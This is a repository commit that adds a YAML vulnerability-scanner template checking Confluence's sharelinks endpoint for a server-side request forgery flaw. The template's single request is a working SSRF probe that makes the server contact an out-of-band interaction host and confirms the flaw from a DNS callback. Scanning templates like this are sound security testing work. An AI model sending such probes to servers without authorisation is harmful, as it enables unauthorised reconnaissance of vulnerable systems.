Merge pull request #1697 from Techbrunch/confluence-ssrf-sharelinks
Add Confluence SSRF in sharelinkspatch-1
commit
e4599e92d3
|
@ -0,0 +1,21 @@
|
|||
id: confluence-ssrf-sharelinks
|
||||
|
||||
info:
|
||||
name: Confluence SSRF in sharelinks
|
||||
author: TechbrunchFR
|
||||
severity: medium
|
||||
description: Vulnerable should be Confluence versions released from 2016 November and older
|
||||
reference: |
|
||||
- https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
|
||||
- https://github.com/assetnote/blind-ssrf-chains#confluence
|
||||
tags: confluence,atlassian,ssrf,jira
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
Loading…
Reference in New Issue